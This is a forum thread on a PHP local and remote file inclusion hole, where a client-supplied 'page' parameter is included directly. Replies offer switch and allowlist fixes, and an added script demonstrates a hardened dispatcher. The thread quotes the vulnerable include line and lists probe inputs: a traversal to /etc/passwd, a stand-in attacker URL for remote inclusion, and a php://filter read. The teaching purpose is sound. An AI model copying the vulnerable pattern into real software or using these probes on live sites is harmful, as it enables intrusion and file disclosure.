Code:
if (isset($_REQUEST["page"]))
{
    // the client-supplied value becomes the include path as-is
    include $_REQUEST["page"].".php";
}
if (isset($_REQUEST["logout"]))
{
    include "logout.php";
}

thanks
Code:
// $path must point at the directory holding the page scripts (assumed here: this script's directory)
$path = __DIR__;

if (isset($_REQUEST["page"]))
{
    $page = $_REQUEST['page'];
    // only include the page when the file exists under $path
    if (file_exists("$path/$page.php"))
    {
        include "$path/" . $_REQUEST["page"] . ".php";
    }
}
if (isset($_REQUEST["logout"]))
{
    $logout = $_REQUEST['logout'];
    if (file_exists("$path/$logout.php"))
    {
        include "logout.php";
    }
}

Code:
<?php
/**
 * $_GET['page'] pulls page from the URL querystring.
 * $_POST['page'] pulls page from form post values.
 * $_COOKIE['page'] pulls page from a cookie with key "page".
 *
 * KNOW where your data is coming from. (Don't use $_REQUEST)
 */
# Fetch page
$page = (isset($_GET['page'])) ? $_GET['page'] : '';
# Define absolute path
$absolute_path = '/var/www/';
# Include your page: the request value only selects a case, the filename is fixed
switch ($page)
{
    case 'my_account':
        include_once($absolute_path . 'my_account.php');
        break;
    case 'logout':
        include_once($absolute_path . 'logout.php');
        break;
    default:
        include_once($absolute_path . 'home.php');
        break;
}
?>

You have a remote file inclusion threat in your application, and a local file inclusion vulnerability. You can't trust any data the client sends you.

vin_akleh wrote:
well is it? if so what is the solution?

Code:
if (isset($_REQUEST["page"]))
{
    include $_REQUEST["page"].".php";
}
if (isset($_REQUEST["logout"]))
{
    include "logout.php";
}
thanks
Code:
$allowedPages = array('home', 'downloads', 'contact');
// Fetch the requested page; fall back to 'home' when the parameter is absent
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!in_array($page, $allowedPages, true)) // Is the page allowed to be accessed? (strict: string match only)
    $page = 'home';
include($page . '.php');
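The fixes in this thread all come down to the same rule: the client's value may pick a page, but it must never become part of the path. As an added example that is not code from any of the posts above, the script below carries that a step further. The request value is only a key into a table of files, a realpath() containment check runs before the include, and a few constructed probe values show what the originally posted `include $_REQUEST["page"].".php"` would have built from them (the earlier file_exists() variant still builds its path from the client's value, which is why the lookup table replaces it here). Assumed, and not stated anywhere in the thread: PHP 8 or later, a pages/ directory next to the script, and the four page names in the table.

```php
<?php
// Added example, not code from the original thread. It contrasts the path that
// the posted `include $_REQUEST["page"].".php"` would build with an allowlist
// dispatcher in which the request value is only a lookup key.
// Assumptions made here (not stated in the thread): PHP 8+, the page scripts
// live in a pages/ directory next to this file, and the page names below.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// The request value selects an entry; the filename always comes from this table,
// so "../", stream wrappers or a URL in ?page= never become part of the path.
const PAGES = [
    'home'       => 'home.php',
    'my_account' => 'my_account.php',
    'downloads'  => 'downloads.php',
    'contact'    => 'contact.php',
];

/** What the posted code builds: the client fully controls the include path. */
function vulnerablePath(string $requested): string
{
    return $requested . '.php';
}

/** Allowlist lookup: returns the fixed file for a known key, null otherwise. */
function resolvePage(mixed $requested): ?string
{
    // Only plain strings can be keys; ?page[]=x arrives as an array and is rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$requested];
}

/**
 * Defence in depth at the moment of inclusion: realpath() follows symlinks and
 * resolves "..", so we confirm the file really sits under $base before include.
 */
function confirmInside(string $path, string $base): ?string
{
    $real = realpath($path);
    $realBase = realpath($base);
    if ($real === false || $realBase === false) {
        return null;
    }
    return str_starts_with($real, $realBase . DIRECTORY_SEPARATOR) ? $real : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed probe values, passed through the path logic only (nothing is included).
    $probes = [
        'my_account',                                         // legitimate page
        '../../../../etc/passwd',                             // traversal (local file inclusion)
        'http://attacker.example/shell',                      // remote URL (RFI when allow_url_include=On)
        'php://filter/convert.base64-encode/resource=index',  // stream wrapper
    ];
    foreach ($probes as $p) {
        printf("input:       %s\n", $p);
        printf("  posted:    include %s\n", vulnerablePath($p));
        printf("  allowlist: %s\n\n", resolvePage($p) ?? 'rejected, home.php served');
    }
} else {
    $page = resolvePage($_GET['page'] ?? 'home') ?? PAGE_DIR . '/home.php';
    $file = confirmInside($page, PAGE_DIR);
    if ($file !== null) {
        include_once $file;
    }
    // logout is a separate flag, never a filename taken from the client
    if (isset($_GET['logout'])) {
        include_once PAGE_DIR . '/logout.php';
    }
}
```

Run it from the command line (`php dispatcher.php`) to see the four probes side by side: the posted include turns every one of them into a path it will try to load, while the allowlist returns a fixed file for `my_account` and rejects the rest. The realpath() check is deliberately separate from the lookup so it keeps protecting the include even if someone later puts a relative path into the table.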